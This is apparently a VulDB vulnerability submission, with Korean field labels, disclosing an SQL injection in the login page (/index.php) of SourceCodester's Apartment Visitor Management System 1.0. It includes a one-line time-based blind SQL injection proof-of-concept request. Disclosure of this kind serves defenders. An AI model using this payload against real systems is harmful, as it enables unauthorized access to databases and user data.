| 제목 | Apartment Visitor Management System-SQL injections |
|---|
| 설명 | Apartment Visitor Management System-SQL injections
Date:
2022-08/06
Exploit Author:
[email protected]
Vendor Homepage:
https://www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code
Version:
1.0
/index.php
”password“Parameters have SQL injections
POC
login=&password=admin123&username=' AND (SELECT 4955 FROM (SELECT(SLEEP(5)))RSzF) AND 'htiy'='htiy
details:
https://github.com/anx0ing/CVE_demo/blob/main/2022/Apartment%20Visitor%20Management%20System-SQL%20injections.md |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code |
|---|
| 사용자 | anx0ing (UID 30698) |
|---|
| 제출 | 2022. 08. 05. PM 06:32 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 05. PM 08:41 (2 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 205665 [SourceCodester Apartment Visitor Management System 1.0 index.php 사용자 이름 SQL 주입] |
|---|
| 포인트들 | 17 |
|---|